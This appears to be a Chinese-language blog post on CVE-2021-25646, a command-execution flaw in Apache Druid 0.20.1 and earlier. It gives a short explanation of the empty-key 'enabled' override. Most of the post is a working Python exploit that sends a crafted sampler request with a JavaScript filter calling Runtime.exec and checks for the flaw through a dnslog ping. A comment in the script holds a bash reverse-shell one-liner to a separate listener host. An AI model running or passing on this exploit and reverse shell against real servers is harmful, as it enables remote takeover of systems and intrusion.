Skip to content
Posted by
By
king
简介
- filter的空键值注入
- 当filter空键的值的enabled选项为true时,允许执行javascript
- Druid的JavaScript不在沙盒中运行,而对机器有完全的访问权限
CVE-2021-25646
1.描述
- Apache Druid <= 0.20.1
- 一个命令执行漏洞
2.原理
- 覆盖filter空键值的enable选项为true,执行javascript函数。
3.poc
- poc.pyimport requests
url = “http://192.168.76.138:8888/druid/indexer/v1/sampler?for=connect”
subdomain = str(input(“Please open ‘http://dnslog.cn/’.Get subdomain:”))
poc = ‘ping {}’.format(subdomain) #少用这个POC,不稳定
# poc = ‘{}’.format(subdomain) #/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/192.168.76.135/1234 0>&1
headers = {
“Host”: “192.168.76.138:8888”,
“Referer”: “http://192.168.76.138:8888/unified-console.html”,
“Origin”: “http://192.168.76.138:8888”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0”
}
data = {
“type”:”index”,
“spec”:
{
“type”:”index”,
“ioConfig”:
{
“type”:”index”,
“firehose”:
{
“type”:”local”,
“baseDir”:”quickstart/tutorial/”,
“filter”:”wikiticker-2015-09-12-sampled.json.gz”
}
},
“dataSchema”:
{
“dataSource”:”sample”,
“parser”:
{
“type”:”string”,
“parseSpec”:
{
“format”:”json”,
“timestampSpec”:
{
“column”:”time”,
“format”:”iso”
},”dimensionsSpec”:{}
}
},”transformSpec”:
{
“transforms”:[],
“filter”:
{
“type”:”javascript”,
“function”:”function(value){return java.lang.Runtime.getRuntime().exec(‘%s’)}”%poc,
“dimension”:”added”,
“”:
{
“enabled”:”true”
}
}
}
}
},
“samplerConfig”:
{
“numRows”:500,
“timeoutMs”:15000,
“cacheKey”:”4ddb48fdbad7406084e37a1b80100214″
}
}
res = requests.post(url=url,json=data,headers=headers)
content = res.content
status = int(res.status_code)
if status == 502:
print(“CVE-2021-25646 is exist!”)
print(res)
4.EXP
Scroll to Top
